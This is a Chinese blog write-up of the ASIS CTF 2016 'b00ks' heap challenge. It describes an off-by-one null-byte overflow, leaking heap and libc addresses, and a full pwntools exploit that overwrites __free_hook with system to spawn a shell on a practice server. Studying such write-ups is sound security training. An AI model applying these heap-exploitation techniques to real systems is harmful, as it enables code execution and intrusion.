堆溢出off-by-one (asis-ctf-2016 b00ks)

已于 2024-03-12 17:21:58 修改
阅读量1.3k 收藏 44
点赞数 38
分类专栏: pwn 文章标签: python
于 2024-03-12 17:21:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/136657934
版权
堆溢出off-by-one (asis-ctf-2016 b00ks)

拖拖沓沓的搞了好久,本来打算上周搞定的,结果拖到了现在(

  • libc-2.23

  • 漏洞点:

    author name 输入为32,也就是这里的a2=32,经历了32次++a1后,a1[32]=0,而这是第33位。
    在这里插入图片描述

​ 其他地方对于这个scanf_s的调用正常,因为都是输入的size-1
在这里插入图片描述

  • 创建堆块:

    这个写着最大32,但是无妨,可以更大,需要注意的是,这里输入的size必须是十进制数。(以前做的题往往喜欢输入成0x20,0x30等等)(看了看以前做的题,都是用atoi转了,所以可以那么输入。)

    在这里插入图片描述

book_list以及author_name_list仍然保存一个地址,那个地址指向真正的数据域
在这里插入图片描述在这里插入图片描述

每一个book的存储大致形式:
在这里插入图片描述

  • 用过的块的id同样不能再重复使用,最多20次对块的创建操作。
sl(b'C'*31+b'D'*1)
new(b'140',b'AAAAAA',b'140',b'BBBBBB')
show()

泄露出book1的0x30大小的指挥块位置(这里指向的是id)

  • 还剩0x20e80,把它用完,让mmap再分配内存。
    在这里插入图片描述

  • 这时候从heap里看不到那个新的很大的块,从控制块中找到它们。
    在这里插入图片描述

  • 接下来把60覆盖成00

    在这里插入图片描述

  • 不知道为什么泄露出来的book_2_name的地址(也就是那个0x7f的)与libc_base的基地址偏移每次不同

更换思路,用unsortedbin来泄露

  • 原本的book2_control的距离+8刚好是可以泄露fd指针的.
  • 计算得到book4_control块的距离。(这是已经到最后的new,book4之后才用debug看的距离,其实可以提前算,不过麻烦,不如直接看debug减出来距离)
payload = b"A" * (0x100 - 0xc0) +p64(1)+ p64(book2_control + 8)+p64(book4_control+0x10) +p64(0xffff)

  • 注意这里:后面一定要加长度,要不然输入不进去,这代表这description的长度

    payload = p64(free_hook)+p64(0xffff)

    我用的libc直接是glibc中的2.23的,后续把它换成buu的远程就直接能通过

总exp:

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
#p=process('./b00ks')
p=remote('node5.buuoj.cn',26785)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda   :p.recvline()

def debug():
    gdb.attach(p)
    pause(1)


def new(name_size,name,des_size,des):
    ru('Exit')
    sl(b'1')
    ru('Enter book name size:')
    sl(name_size)
    ru('Enter book name (Max 32 chars):')
    sl(name)
    ru('Enter book description size:')
    sl(des_size)
    ru('Enter book description:')
    sl(des)


def dele(ID):
    ru('Exit')
    sl(b'2')
    sl(ID)


def edit(ID,des):
    ru('Exit')
    sl(b'3')
    rl()
    sl(ID)
    ru('description')
    sl(des)


def show():
    ru('Exit')
    sl(b'4')

def change(content):
    ru('Exit')
    sl(b'5')
    sl(content)


sl(b'C'*31+b'D'*1)
new(b'140',b'book1',b'140',b'first book')
show()
ru('CCCD')
book1_control = u64(rc(6).ljust(8,b'\x00'))
book2_control = book1_control + 0x30
book4_control = book1_control + 0x450
#print(hex(book1_control))

new(b'512',b'book2',b'512',b'second book')
new(b'20',b'/bin/sh\x00',b'20',b'/bin/sh\x00')
#debug()
dele(b'2')
payload = b"A" * (0x100 - 0xc0) +p64(1)+ p64(book2_control + 8)+p64(book4_control+0x10) +p64(0xffff)
edit(b'1', payload)
change(b'C'*31 + b'D'*1)
show()

#offset = 0x7f2da9d56010 - 0x7f2da9600000
#print(offset)
#libc = ELF('/home/kali/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
libc = ELF('/home/kali/Desktop/libc-2.23.so')
rl()
rl()
p.recv(6)
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - 88 - 0x10 -(0x7f5b3ddc4b10-0x7f5b3da00000)
print(hex(libc_base))
system_addr = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']


#edit(b'1',p64(bin_sh)+p64(free_hook))
new(b'140',b'book4',b'140',b'forth book')
payload = p64(free_hook)+p64(0xffff)
edit(b'1',payload)

#debug()
edit(b'4',p64(system_addr))
#debug()

dele(b'3')


p.interactive()

十分感谢师傅们的详细博客–参考博客:

[Asis CTF 2016] b00ks —— Off-By-One笔记与思考_asis ctf 2016 b00ks-CSDN博客

Asis 2016 b00ks (off by one利用)-Pwn-看雪-安全社区|安全招聘|kanxue.com

XYYR-c
关注
  • 38
    点赞
  • 44
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初探off-by-one之Asis CTF 2016 b00ks
Vicl1fe的博客
09-25 968
题目链接:ctf-wiki 参考链接:传送门 如果不懂,可以加讨论qq群:946220807 欢迎大佬坐阵 Off-by-one 单字节溢出,顾名思义,可溢出并且只溢出一个字节。具体还是看题吧。实践出真理。 代码分析 拿到题后,是一个图书管理系统,代码实现五个功能 功能: 创建一个图书 删除图书 编辑图书 打印图书内容 修改作者的名字。 程序刚开始,会让你输入作者的名字,可以看到这里调用了...
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1396
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
【PWN · heap | Off-By-One】Asis CTF 2016 b00ks
Mr_Fmnwon的博客
10-29 303
步入堆的学习。堆的知识复杂而多,于是想着由wiki从简单部分逐个啃。b00ks是经典的堆上off-by-one漏洞题目。刚开始看很懵(因为确实连堆的管理机制都没有完全了解)。
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 562
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
Off-By-One Asis CTF 2016 b00ks
qq_39153421的博客
03-09 468
Off-By-One学习、练习0x1、Off-By-One原理0x2、Asis CTF 2016 b00ks1、利用流程:2、泄露过程a、输入用户名,泄露book1地址b、构造假的fake_book结构体,使其指向book2的name和description字段。c、修改book1的描述字段,填入fake_book,输出book,得到book2的name和description地址。d、根据book2的name字段(为什么要是这个字段呢?)由固定偏移计算libcbasee、根据libcbase得到syste
堆中的off-by-one :ASIS CTF 2016:b00ks
qq_36918532的博客
01-12 2419
ASIS CTF 2016:b00ks 最近在练习pwn题,主要看的是ctf竞赛权威指南这本书,感觉这个题太巧妙了,记录一下 首先拿到文件第一步查看检查: 然后拿到IDA里面看: 在sub_b6d()函数中使用了一个自己写的read函数(这个函数存在一个off-by-one漏洞) 并且可以看到这里name存在off_202018 分析知道0ff_202010存的是book结构体 二者相差20个偏移 打印就是规中规矩的了,然后看修改作者姓名的,发现仍然是sub_b6d函数,但是在修改的时候就只能溢出
溢出----Off-By-One
qq_42192672的博客
10-22 3210
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/off_by_one/#_5 off-by-one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节,emmm 看一下CTFWIKI给的第一个例子(循环边界) int my_gets(char *ptr,int size) { i...
溢出off-by-one(asis-ctf-2016 pwn 之 b00ks)
九层台
08-01 2311
这些天积累也知道了一些关于glibc内存的分配策略。 说pwn 是在内存里捉迷藏其实到这里才真正接触大片的内存。精确控制就能保证精确修改数据。 需要的一个很重要的能力就是跟内存的能力。 这里调试exp用gdb.attach(p)来下断点,弹出调试界面。跟踪内存。 用gdb的x命令/xg参数来查看内存以十六进制8字节显示。 这个程序开启了PIE跟踪不太容易,不过可以用find命令查找输入的...
OFF BY ONE AsisCTF2016b00ks
Grxer的博客
03-20 105
题目链接:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/off_by_one/Asis_2016_b00ksmore有漏洞会多读取一个字节的/x00author name存放在unk_202040+pie处,32个字节分析后可以推断出book结构体是如下的,而且在unk_202060+pie处开始存放结构体指针,我们可以进行一个字节的溢出,来控制book1的最低位地址。
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库.docx
07-05
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库
Python-关联分割点云中的实例和语义
08-11
此外,还有一些专门为点云设计的网络结构,如PointSeg、SemanticFPN和ASIS(即这个项目的名字),它们在关联分割上表现优秀。 ASIS(Adaptive Shape Instance Segmentation)项目可能是这个压缩包的核心内容。它...
ASIS for GNAT-开源
05-15
ASIS 本身是 ISO / IEC 15291:1999 国际标准,确保了不同实现之间的兼容性,使得开发者可以编写一次工具,然后在遵循 ASIS 标准的不同 Ada 编译器上运行。这一标准的制定,极大地促进了 Ada 开发环境的生态系统发展...
ctf-writeups:CTF撰写
05-17
准备Docker容器为了毫无问题地运行挑战POC,我为各种Ubuntu版本准备了docker容器。 有关使用容器的说明,请参见。...32 NX Partial RELRO ASLR ret2libc stack overflow CTFtime Writeups档案ASIS
H20asis-项目开发
03-30
在“H20asis-项目开发”中,我们聚焦于一个创新的非接触式饮水机设计,旨在确保用户在饮水时的安全与卫生。这个项目的核心是利用先进的技术来改进传统的饮水设备,使其更加人性化和适应现代健康需求。下面将详细讨论...
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 103
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 743
在Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 658
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 2323
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
ASIS+Quals
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:1999)。它提供了一种机制,使得可以在Ada程序中访问和操作程序的语法和语义信息。ASIS可以用于许多应用程序,例如代码分析、代码转换、代码生成...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值